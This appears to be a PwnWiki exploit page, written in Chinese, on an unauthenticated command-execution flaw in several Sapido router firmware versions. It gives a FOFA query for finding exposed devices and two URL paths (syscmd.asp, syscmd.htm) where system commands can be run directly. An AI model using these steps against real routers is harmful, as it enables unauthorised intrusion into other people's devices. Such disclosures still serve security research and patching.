Sapido多款路由器命令執行漏洞

From PwnWiki
Revision as of 09:35, 19 March 2021 by Pwnwiki (talk | contribs) (Marked this version for translation)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:

漏洞影響

BR270n-v2.1.03

BRC76n-v2.1.03

GR297-v2.1.3

RB1732-v2.0.43


FOFA

app="Sapido-路由器"

漏洞利用

訪問目標,直接輸入系統命令即可執行。

http://xxx.xxx.xxx.xxx/syscmd.asp
http://xxx.xxx.xxx.xxx/syscmd.htm